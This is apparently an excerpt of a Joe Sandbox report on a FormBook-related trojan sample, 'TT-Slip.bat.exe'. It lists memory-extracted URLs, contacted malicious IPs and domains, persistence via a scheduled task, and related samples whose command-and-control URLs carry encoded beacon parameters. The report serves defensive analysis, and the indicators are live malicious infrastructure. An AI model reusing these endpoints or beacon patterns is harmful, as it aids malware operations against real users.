http://push.zhanzhang.baidu.com/push.js	compact.exe, 00000011.00000002.4516014437.0000000004834000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000003D74000.00000004.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.loopia.se/responsive/images/iOS-72.png	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://shahaf3d.com/wp-admin/admin-ajax.php	compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css	compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.googleoptimize.com	compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/logo/logo-loopia-white.svg	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://youtu.be/uO1hXLmT2j4	compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fburl.com	compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	compact.exe, 00000011.00000002.4516014437.00000000046A2000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000003BE2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.searchvity.com/?dn=	compact.exe, 00000011.00000002.4516014437.0000000005332000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000004872000.00000004.00000001.00040000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2	compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	TT-Slip.bat.exe, 00000000.00000002.2098433480.0000000002596000.00000004.00000800.00020000.00000000.sdmp, IiIseKTckjhZgQ.exe, 0000000A.00000002.2300572869.000000000336E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/style/2022-extra-pages.css	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css	compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg	ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://static.loopia.se/responsive/images/iOS-114.png	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.litespeedtech.com/error-page	compact.exe, 00000011.00000002.4516014437.00000000049C6000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000003F06000.00000004.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://wordpress.org/plugins/cmp-coming-soon-maintenance/	compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.googleanalytics.com	compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://zz.bdstatic.com/linksubmit/push.js	compact.exe, 00000011.00000002.4516014437.0000000004834000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000003D74000.00000004.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://klimkina.pro/4mpz/?I2ID3h=Y	compact.exe, 00000011.00000002.4516014437.000000000405A000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000359A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.loopia.se/responsive/styles/reset.css	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.loopia.se/responsive/images/iOS-57.png	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693	compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://td.doubleclick.net	compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.hostgator.com.br	compact.exe, 00000011.00000002.4516014437.0000000003EC8000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000003408000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.searchvity.com/	compact.exe, 00000011.00000002.4516014437.0000000005332000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000004872000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shahaf3d.com	ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693	compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.leadchanges.info	ISsofSsdrAsp.exe, 00000012.00000002.4517126416.000000000517F000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
195.35.39.119	futuregainers.net	Germany	8359	MTSRU	true
194.9.94.86	www.torentreprenad.com	Sweden	39570	LOOPIASE	true
185.137.235.125	www.klimkina.pro	Russian Federation	49505	SELECTELRU	true
162.0.213.94	www.lenovest.xyz	Canada	35893	ACPCA	true
172.82.177.221	www.931951.com	United States	46261	QUICKPACKETUS	true
66.96.162.149	www.leadchanges.info	United States	29873	BIZLAND-SDUS	true
15.204.0.108	srripaspocon.org	United States	71	HP-INTERNET-ASUS	true
35.214.235.206	www.grecanici.com	United States	19527	GOOGLE-2US	true
64.46.118.35	shahaf3d.com	United States	32475	SINGLEHOP-LLCUS	true
54.179.173.60	dns.ladipage.com	United States	16509	AMAZON-02US	true
18.178.206.118	www.93v0.com	United States	16509	AMAZON-02US	true
162.241.2.254	shopnow321.online	United States	26337	OIS1US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1449570
Start date and time:	2024-05-30 15:00:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TT-Slip.bat.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/16@20/12
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 92% Number of executed functions: 172 Number of non-executed functions: 252
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:01:02	API Interceptor	2x Sleep call for process: TT-Slip.bat.exe modified
09:01:04	API Interceptor	53x Sleep call for process: powershell.exe modified
09:01:09	API Interceptor	2x Sleep call for process: IiIseKTckjhZgQ.exe modified
09:02:10	API Interceptor	10997380x Sleep call for process: compact.exe modified
15:01:06	Task Scheduler	Run new task: IiIseKTckjhZgQ path: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.9.94.86	Doc PI.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	Beauty_Stem_Invoice.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	SalinaGroup.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	PAY-0129.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/s2u9/?7H=mTJ4yhH&qHaT0h=5U7DALWrxqzr56VTS66DkMzivwb8eJw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH0jqi0U2E5YHFFFQ==
	DHL_SOA_1004404989.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/s2u9/?j8j=6NzlX4xHmtqH&rR=5U7DALWrxqzr56VMLK7KnfayygnCZIw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH3pN+aCUsxPyV8FA==
	Scan00516.js	Get hash	malicious	FormBook, MailPassView, WSHRAT	Browse	www.acre-com.com/me15/?i8O=bxl0&VPudI=AMxDUnLLexuTfXRuHqoxzPfeXrfBw2lKu15RcCpXpuJEBCulcUbatn2YVJ6xbnCfmbZZ
	SHIPPINGDOCUMENTS.25.23.exe	Get hash	malicious	FormBook	Browse	www.udda.app/ga36/?-Zk4Ah=uKy05ssFXwD7lx+pwOkpcz0JYvvlr0Fm4k7Q090T/1T8NUAbWqhr3VP8iMZHhaUYUaRp&-ZVd=5jo8nLy8
	g8G146l8XU.exe	Get hash	malicious	FormBook	Browse	www.frostdal.se/s26y/?8pAlmdiX=882d78zUy4+UMlJ0mFcKU0FzzswBpgbUl63S0CTJJ7YYOy24S5YeYqbYAzkKlVaYLwFJ&h0DxKN=l4G4b
	Portfunktionen.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.seansaren.com/8mkm/?YfxdA=0TBXZr6&8p9dCJU=dq4Bmr7ke09F/j6gqFBYy8hUF+OUtSAKtvg3uyO8Hql2Nxy80d4gIJwQmfcVpJqaQnb4Hw97lY925H1T11NKL9RBbHv3rBHVxw==
185.137.235.125	MV MASTER.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.olgache.xyz/m02u/?5jBp=SFlVzogYIMMdTUANsOTzLx46vQlpDm+tJbna1I/IgT07XpqoSAWoIZuH7ImWMSbJQArO&-Zi4=ML30vvf82DxPP
185.137.235.125	RFQ.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.olgache.xyz/m02u/?TbsPOl=sXppdH&pRY=SFlVzogYIMMdTUANsOTzLx46vQlpDm+tJbna1I/IgT07XpqoSAWoIZuH7ImWMSbJQArO
162.0.213.94	RB_VAC_1.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.chinchap.xyz/t3ue/
	Petro Masila 105321.exe	Get hash	malicious	FormBook	Browse	www.princestun.xyz/4vs4/
	PO 027371.exe	Get hash	malicious	FormBook	Browse	www.princestun.xyz/4vs4/
	PAY-0129.exe	Get hash	malicious	FormBook	Browse	www.chinchap.xyz/s2u9/?qHaT0h=GFiZ4lzykiAkjkYMX1AQruBBlY+JDhm2S0U6V9QE9B/raPoqdxrfdCyyq11B5B9NKxpsF80MvpZc2ueHLfrhP12RIFzpRyMC6A==&7H=mTJ4yhH
	PgbcaAGOnA.exe	Get hash	malicious	FormBook	Browse	www.rigintech.info/q0a9/?1Prd=ibILxh&_LslrNA=P4xybVgLtrThJ7/gdzCFLLBMT5Dy4XS78bWftXfkNvSW5cUDpuLBoMx4Gi0YHaiBE8JTg9kp6HCWmyr4mdTAqsuW8pT+mZB8igPIsbzksFX8
	YPtC8uu6px.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.princestun.xyz/e0ff/?XTw0=ihiX7ruHB4&KRlDHViH=65CIsjiLW3AuUNF9No8Nxn1HOiflu6ZRYLpFciFRuT0aLHZsl2anrsvCkzc5RC4M17iTdgnxPrkoiI97b8zRxzU7NJvigTQfVA==
	Kopje_e_pageses_bankare.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.gadpuch.website/6qne/
	CamScanner_12-12-2023_01.03.exe	Get hash	malicious	FormBook, zgRAT	Browse	www.chinchap.xyz/s2u9/?Jhd=GFiZ4lzykiAkjkYMX1AQruBBlY+JDhm2S0U6V9QE9B/raPoqdxrfdCyyq11B5B9NKxpsF80MvpZc2ueHLfrhP12RIEzrGHc76Q==&UlQ4S=u6_puDX
	Maksajuma_kopija.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.gadpuch.website/6qne/?zFVEsFc=inWKn57lhFyxSZpNF5zv89AEkh0uownmEzA11sKfgtt2zlohBwGKrnJ+pun2I2Opw7Hg4sYexJlcdfcy6bYLlsIaIJiieVpwZw==&au=3mf52R
	00726736625241525.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.gadpuch.website/6qne/?T6d7v=inWKn57lhFyxSZpNF5zv89AEkh0uownmEzA11sKfgtt2zlohBwGKrnJ+pun2I2Opw7Hg4sYexJlcdfcy6bYIxf4fJ+ecTHNZO3yKN28QsJ9V&P9I=5Nqp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dns.ladipage.com	BL4567GH67_xls.exe	Get hash	malicious	FormBook	Browse	54.179.173.60
	Scan Document Copy_docx.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	ungziped_file.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	SecuriteInfo.com.Win32.PWSX-gen.5935.26892.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	18.139.62.226
	inquiry.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	purchase order 8MCE15.scr.exe	Get hash	malicious	FormBook	Browse	18.141.244.39
	SecuriteInfo.com.Heur.21813.17790.exe	Get hash	malicious	FormBook	Browse	18.140.75.249
	SecuriteInfo.com.Variant.Lazy.487114.22589.2790.exe	Get hash	malicious	FormBook	Browse	18.141.244.39
	SecuriteInfo.com.Win32.PWSX-gen.32091.16097.exe	Get hash	malicious	FormBook	Browse	18.141.244.39
	Swift Copy.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	18.141.244.39
www.93v0.com	Swift_Copy.exe	Get hash	malicious	FormBook	Browse	18.178.206.118
www.grecanici.com	ORDINE_N.202309028.exe	Get hash	malicious	FormBook, GuLoader	Browse	35.214.235.206
	8nEe7PHbq6.img	Get hash	malicious	FormBook, GuLoader	Browse	35.214.235.206
	BRIDGE_POLYMERS_POLSKA_23085571.exe	Get hash	malicious	FormBook, GuLoader	Browse	35.214.235.206
	SWIFT_COPY.exe	Get hash	malicious	FormBook	Browse	35.214.235.206
www.lenovest.xyz	dhl-shipment4820911.exe	Get hash	malicious	FormBook	Browse	162.0.213.94

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MTSRU	ux0nQXF0P6.elf	Get hash	malicious	Mirai	Browse	85.141.148.218
	8427xbk3Zt.elf	Get hash	malicious	Unknown	Browse	94.72.5.126
	cVxP229sNF.elf	Get hash	malicious	Unknown	Browse	213.87.148.228
	BEddZjSb7A.elf	Get hash	malicious	Unknown	Browse	83.237.14.111
	mKBZo65Fcb.elf	Get hash	malicious	Mirai	Browse	85.140.83.134
	https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	195.35.33.215
	n8RoxsQ4om.elf	Get hash	malicious	Mirai	Browse	85.140.83.182
	4YD5S0tWKz.elf	Get hash	malicious	Unknown	Browse	195.96.78.4
	kWZnXz2Fw7.elf	Get hash	malicious	Mirai	Browse	89.175.13.191
	bnJSH0V4Je.elf	Get hash	malicious	Mirai	Browse	62.118.120.116
LOOPIASE	SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	product Inquiry and RFQ ART LTD.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
	COMMANDE.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	194.9.94.85
	New Order.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
	GXu0Ow8T1h.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	GcwoApxt8q.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Doc PI.doc	Get hash	malicious	FormBook	Browse	194.9.94.86
	opszx.scr.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Beauty_Stem_Invoice.doc	Get hash	malicious	FormBook	Browse	194.9.94.86
	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	194.9.94.86
ACPCA	mips.nn.elf	Get hash	malicious	Mirai	Browse	162.128.160.211
	skt.arm6.elf	Get hash	malicious	Mirai	Browse	162.9.162.159
	PDF89gh ReUrgent Quotepdf.exe	Get hash	malicious	FormBook	Browse	162.0.222.196
	RB_VAC_1.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	162.0.213.94
	Tenuto.exe	Get hash	malicious	FormBook, GuLoader, LummaC Stealer	Browse	162.0.222.196
	https://serviceclient.akomeryemrentals.inovaperf.me/aurelie.--_--boichard%40/bellatrix.l--_--estrange%40/daniell--_--marchand/innocenti.--_--patrick/	Get hash	malicious	Unknown	Browse	162.55.246.61
	darkcloud.exe	Get hash	malicious	Unknown	Browse	162.55.60.2
	darkcloud.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	http://www.loli.blogjmc2024.my.id/	Get hash	malicious	Unknown	Browse	162.55.246.61
	https://pdf-ca0478494.istmein.de/svx/	Get hash	malicious	Unknown	Browse	162.55.246.61
SELECTELRU	https://marvin-occentus.net	Get hash	malicious	Unknown	Browse	31.184.209.76
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	31.184.254.98
